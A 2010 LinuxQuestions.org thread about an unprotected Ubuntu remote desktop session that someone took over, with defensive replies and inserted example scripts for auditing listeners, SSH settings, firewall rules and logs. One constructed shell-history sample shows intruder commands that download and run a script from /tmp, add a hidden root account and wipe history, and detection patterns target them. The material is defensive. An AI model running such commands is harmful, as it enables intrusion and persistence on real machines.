LinuxQuestions.org
Old 04-27-2010, 12:17 PM   #1
The Dude
Ubuntu Remote Desktop Connection Breach?! dyndns.org?


So, this morning, I was working on my desktop under Ubuntu 9.10 when I got a message in the upper right telling me that my Remote Desktop Connection had been activated. I don't know who it was, but they proceeded to open up a terminal and start typing a bunch of stuff. This scared the living @#$^ out of me, so I didn't really pay attention to what he was doing and immediately dove for the reset button. I disconnected my network from the web and found that RDC was NOT password protected.

Now, I probably did this a little while ago while I was playing around with it, but I also set up an account with dyndns.org. Would this possibly increase the number of attacks on my network? Just in case, I have removed my listing.

Also, would any of this incident be logged somewhere? How/Where would I look to see if I'm being poked and prodded for another security hole?

I'm still pretty new to linux (I've been using it for about a year now), and I really appreciate your help. So, thanks.
 
Old 04-27-2010, 02:48 PM   #2
anomie
One of the first things you should do on a newly installed, modified, or inherited system is run:

# netstat -ltnup

Take careful note -- these are all the services that your host is offering up and accepting tcp or udp connections on. If you see applications here that you don't need/want to run, then disable them. If you see applications that are listening on an external interface, but don't need to be, then correct their configuration. You can also plan your host-level firewall ruleset based on what legitimately needs to be listening.

About your dyndns question: I wouldn't necessarily assume that someone found your host using DNS rec info. It is more likely that someone was scanning large subnets, and discovered you had a listening service to attack.
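The listener check above, as an added example that is not part of the original post: a small parser over `netstat -ltnup` output that separates sockets bound to loopback from those reachable from the network, which is the distinction that matters when deciding what to disable or firewall. The sample output is constructed (vino-server is the process behind Ubuntu's Remote Desktop; the PIDs and other entries are made up). The field layout assumed is netstat's; `ss -ltnup` prints different columns and would need its own parser.

```sh
#!/bin/sh
# Added example (not from the thread): classify listening sockets from
# `netstat -ltnup` style output into loopback-only vs externally reachable.
# Input format assumed: the column layout netstat prints on Linux.

# Constructed sample output, in the shape `netstat -ltnup` prints.
SAMPLE='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      1234/vino-server
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      987/cupsd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      654/sshd
tcp6       0      0 :::5900                 :::*                    LISTEN      1234/vino-server
udp        0      0 0.0.0.0:68              0.0.0.0:*                           321/dhclient
udp        0      0 127.0.0.1:53            0.0.0.0:*                           111/dnsmasq'

# external_listeners: print "proto port program" for every socket bound to a
# non-loopback address (0.0.0.0, ::, or a specific interface address).
external_listeners() {
    printf '%s\n' "$1" | awk '
        $1 ~ /^(tcp|udp)6?$/ {
            # split "addr:port" at the last colon; handles IPv6 "::" forms
            n = split($4, parts, ":")
            port = parts[n]
            addr = substr($4, 1, length($4) - length(port) - 1)
            if (addr == "127.0.0.1" || addr == "::1") next
            printf "%s %s %s\n", $1, port, $NF
        }'
}

# Usage against a live host (run as root so PID/Program name is filled in):
#   external_listeners "$(netstat -ltnup 2>/dev/null)"
# On the constructed sample this prints the two vino-server sockets, sshd
# and dhclient, and drops cupsd and dnsmasq because they bind loopback only.
external_listeners "$SAMPLE"
```

Everything this prints is a service the rest of the network can reach; each entry either needs to exist, needs to be bound to 127.0.0.1 instead, or needs a firewall rule restricting who can talk to it.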
 
Old 04-27-2010, 02:58 PM   #3
corp769
I would also rewrite your iptables to drop incoming requests, allow certain outbound ports, and define which ports you want outgoing, i.e. BitTorrent servers/clients, etc...
 
Old 04-27-2010, 03:55 PM   #4
Hangdog42
Quote:
but they proceeded to open up a terminal and start typing a bunch of stuff.
Did you notice what user it was under? Was the prompt a $ or a #? You might look in .bash_history for your users and see if you recognize any of the commands. Try looking at the output of last to see if you can spot what user they were under.

By the way, since this is Ubuntu and they've pretty much abused the daylights out of sudo, I wouldn't connect this machine to the network until you've had a chance to figure out if they've done anything.

Some useful commands:

ps -axfwwwe - look for unusual processes running.

lsof -Pwn - look at open files

netstat -pantue - see if there are any odd network connections

You're looking for things that are odd or unknown.
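The .bash_history and `last` checks suggested above, as an added example that is not part of the original post: two filters that run over the raw text of those sources and surface the lines worth a second look. Both inputs below are constructed (the IP addresses, the commands, the kernel version); the patterns are a starting heuristic for the kind of thing an intruder typing into a terminal leaves behind, not a complete indicator list.

```sh
#!/bin/sh
# Added example, not from the thread: two small filters for the evidence the
# post suggests pulling (the intruder's shell history and `last` output).
# Sample inputs are constructed; the patterns are a starting heuristic.

# Constructed ~/.bash_history as an intruder might leave it.
HISTORY='ls -la
cd /tmp
wget http://203.0.113.5/x.sh -O /tmp/.x
chmod +x /tmp/.x
/tmp/.x &
sudo useradd -o -u 0 backup2
crontab -l
history -c
exit'

# Constructed `last -i` output: local console logins plus one remote pts login.
LAST='dude     pts/2        198.51.100.23    Tue Apr 27 11:52 - 11:58  (00:06)
dude     tty7         :0               Tue Apr 27 08:10 - down   (03:50)
dude     pts/0        :0.0             Tue Apr 27 08:12 - 11:59  (03:47)
reboot   system boot  2.6.31-20-generic Tue Apr 27 08:09 - 12:01  (03:52)

wtmp begins Tue Apr 27 08:09:50 2010'

# flag_history: print history lines matching common post-compromise actions
# (downloads, chmod +x, binaries run from /tmp or /dev/shm, account or cron
# changes, history wiping).
flag_history() {
    printf '%s\n' "$1" | grep -E \
        -e '^(wget|curl) ' \
        -e 'chmod \+x' \
        -e '^(/tmp|/dev/shm|/var/tmp)/' \
        -e '(useradd|usermod|passwd|crontab)' \
        -e 'history -c' \
        -e 'unset HISTFILE'
}

# remote_logins: from `last -i` output, print user, tty and source for
# sessions whose origin is neither a local X display (":0", ":0.0") nor
# blank (a blank host column shifts a weekday name into field 3).
remote_logins() {
    printf '%s\n' "$1" | awk '
        NF >= 3 && $1 != "reboot" && $1 != "wtmp" \
            && $3 !~ /^:[0-9]/ \
            && $3 !~ /^(Mon|Tue|Wed|Thu|Fri|Sat|Sun)$/ {
            print $1, $2, $3
        }'
}

# Usage on the affected host (as root, before putting it back on the network):
#   flag_history "$(cat /home/*/.bash_history /root/.bash_history)"
#   remote_logins "$(last -i)"
flag_history "$HISTORY"
remote_logins "$LAST"
```

Two caveats a practitioner would add: bash only writes history when the shell exits cleanly, so a session killed by the reset button may have left nothing, and `history -c` in the sample shows why an empty file is itself a finding. Read these files from a live CD or a second machine rather than trusting the tools on a box someone else had a shell on.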
 
Old 04-28-2010, 03:34 PM   #5
Noway2
If I am not mistaken, Remote Desktop Connection is based upon VNC. It is a notoriously insecure application that is responsible for more successful cracks than anything else. If you want remote desktop capability, once you get things straightened out, skip the VNC and use FreeNX or only use VNC through an SSH tunnel. I would also suggest that you get rid of password authentication and use key-based only for your SSH. Applications such as fail2ban and denyhosts help to make cracking attempts more difficult because after a couple of failures their IP will be banned for a period of time.
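The key-only SSH advice above, as an added example that is not part of the original post: an audit of sshd_config that reports what sshd will actually enforce. The detail it gets right is that sshd takes the first value it reads for a keyword (see sshd_config(5)), so a `PasswordAuthentication no` appended at the bottom of a file that already says `yes` higher up changes nothing. Both configs are constructed; Match blocks are not handled; the defaults used when a keyword is absent are OpenSSH's of that era (PermitRootLogin defaulted to yes then, current releases default to prohibit-password). The hostname and user in the tunnel command are placeholders.

```sh
#!/bin/sh
# Added example, not from the thread: check whether an sshd_config actually
# enforces key-only authentication. sshd uses the FIRST value it reads for
# a keyword (sshd_config(5)), so a later "PasswordAuthentication no" does
# not override an earlier "yes"; this audit copies that rule.
# Match blocks are not handled. Sample configs are constructed.

# Constructed config that still accepts passwords despite the trailing line.
WEAK='Port 22
#PasswordAuthentication no
PasswordAuthentication yes
PermitRootLogin yes
Subsystem sftp /usr/lib/openssh/sftp-server
PasswordAuthentication no'

# Constructed hardened config.
HARDENED='Port 22
Protocol 2
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
UsePAM yes
AllowUsers dude'

# sshd_effective CONFIG KEYWORD DEFAULT: print the value sshd would use
# (first non-comment match, keyword compared case-insensitively).
sshd_effective() {
    printf '%s\n' "$1" | awk -v key="$2" -v def="$3" '
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        tolower($1) == tolower(key) && !found { print $2; found = 1 }
        END { if (!found) print def }'
}

# audit_sshd CONFIG: print "OK" or "FAIL:" followed by each failed keyword.
# Defaults passed in are the OpenSSH defaults where the keyword is absent.
audit_sshd() {
    cfg=$1
    fails=""
    [ "$(sshd_effective "$cfg" PasswordAuthentication yes)" = no ] \
        || fails="$fails PasswordAuthentication"
    [ "$(sshd_effective "$cfg" ChallengeResponseAuthentication yes)" = no ] \
        || fails="$fails ChallengeResponseAuthentication"
    [ "$(sshd_effective "$cfg" PubkeyAuthentication yes)" = yes ] \
        || fails="$fails PubkeyAuthentication"
    [ "$(sshd_effective "$cfg" PermitRootLogin yes)" != yes ] \
        || fails="$fails PermitRootLogin"
    if [ -n "$fails" ]; then
        printf 'FAIL:%s\n' "$fails"
    else
        printf 'OK\n'
    fi
}

# Usage on a live host:
#   audit_sshd "$(cat /etc/ssh/sshd_config)"
# With password auth off, reach the VNC server (vino listens on 5900) only
# through SSH, and keep 5900 closed on the firewall; host/user are placeholders:
#   ssh -N -L 5901:127.0.0.1:5900 dude@desktop.example
#   vncviewer localhost:5901
audit_sshd "$WEAK"
audit_sshd "$HARDENED"
```

After editing, `sshd -t` checks syntax and (on newer OpenSSH) `sshd -T` prints the effective configuration, which is the authoritative version of what this script approximates. Keep an existing session open while testing key-only login so a mistake does not lock you out.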
 
Old 04-29-2010, 03:07 PM   #6
unixfool
Quote:
Originally Posted by Noway2
If I am not mistaken, Remote Desktop Connection is based upon VNC. It is a notoriously insecure application that is responsible for more successful cracks than anything else. If you want remote desktop capability, once you get things straightened out, skip the VNC and use FreeNX or only use VNC through an SSH tunnel. I would also suggest that you get rid of password authentication and use key-based only for your SSH. Applications such as fail2ban and denyhosts help to make cracking attempts more difficult because after a couple of failures their IP will be banned for a period of time.
I don't remember the OP saying that the service had been cracked. He stated that he hadn't password-protected it. He could've done the same thing with FreeNX or any other VNC tool. It wasn't the tool, it was user error that caused this.

OP, do as the others have stated. You can still use RDP if you layer your security: use a password!; use iptables to limit who can use RDP; periodically check your machine's running services via netstat. You can do all of that and have a safe machine and still utilize RDP.
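The iptables advice in corp769's reply (#3) and in the post above ("use iptables to limit who can use RDP"), as one added example that is not part of either post: a generator for an iptables-restore ruleset that defaults INPUT to DROP and admits SSH and VNC only from an administrator's network, plus a check that catches the mistake this thread is about, a port accepted from anywhere. The 192.168.1.0/24 network and the port numbers are assumptions standing in for the OP's LAN; outbound traffic is left open, so tightening OUTPUT for things like BitTorrent ports is a separate step.

```sh
#!/bin/sh
# Added example, not from the thread: build an iptables-restore ruleset that
# defaults INPUT to DROP, keeps loopback and established traffic, and admits
# SSH (22) and VNC (5900) only from an administrator's network.
# 192.168.1.0/24 is an assumption standing in for the OP's LAN.

# gen_ruleset ADMIN_CIDR: print the ruleset on stdout.
gen_ruleset() {
    admin=$1
    cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A INPUT -m conntrack --ctstate INVALID -j DROP
-A INPUT -p icmp --icmp-type echo-request -m limit --limit 5/s -j ACCEPT
-A INPUT -p tcp -s $admin --dport 22 -m conntrack --ctstate NEW -j ACCEPT
-A INPUT -p tcp -s $admin --dport 5900 -m conntrack --ctstate NEW -j ACCEPT
-A INPUT -m limit --limit 10/min -j LOG --log-prefix "iptables-drop: "
COMMIT
EOF
}

# open_to_world PORT RULESET: succeed if some rule accepts PORT with no
# source (-s) restriction, i.e. the service is reachable from anywhere.
open_to_world() {
    printf '%s\n' "$2" | grep -E -- "--dport $1 " | grep -v -- ' -s ' | grep -q ACCEPT
}

# Usage (as root):
#   gen_ruleset 192.168.1.0/24 | iptables-restore
#   iptables-save > /etc/iptables.rules      # then restore it at boot
# Periodic check of the live rules for a world-open VNC port:
#   open_to_world 5900 "$(iptables-save)" && echo "5900 open to everyone"
gen_ruleset 192.168.1.0/24
```

The LOG rule at the end is what answers the OP's "am I being poked and prodded" question: every packet that falls through to the DROP policy is written to the kernel log with the `iptables-drop:` prefix, so `grep iptables-drop /var/log/kern.log` shows who is scanning and for which ports. If VNC is only ever used through an SSH tunnel, drop the 5900 rule entirely and let the tunnel carry it.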
 
Old 04-29-2010, 06:20 PM   #7
unSpawn
Breaches via activated RDP seem to be a problem with .*buntu, the topic pops up regularly in some .*buntu forums...
 
  

